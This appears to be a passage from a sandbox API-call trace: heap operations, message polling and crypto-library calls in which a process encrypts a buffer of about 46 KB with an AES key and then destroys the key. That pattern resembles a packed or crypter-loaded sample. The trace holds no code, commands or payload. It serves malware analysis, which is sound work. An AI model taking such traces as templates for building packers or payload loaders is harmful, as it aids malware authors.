Size=0x4) returned 0x7da398 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.575] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.575] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.576] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.576] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0031.576] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0031.577] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c970 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.577] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.577] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0031.577] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.578] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.578] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0031.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0031.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0031.580] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da398, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da398*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.580] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.580] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.581] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.581] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.581] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0031.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.582] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xb402, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xb410) returned 1 [0031.582] CharLowerBuffW (in: lpsz="byte[46097]", cchLength=0xb | out: lpsz="byte[46097]") returned 0xb [0031.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.583] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a67d0*, pdwDataLen=0x6ae220*=0xb402, dwBufLen=0xb410 | out: pbData=0x8a67d0*, pdwDataLen=0x6ae220*=0xb410) returned 1 [0031.583] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.583] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.583] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.584] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.588] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.588] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.588] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.589] CryptDestroyKey (hKey=0x7c2280) returned 1 [0031.589] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0031.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.589] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 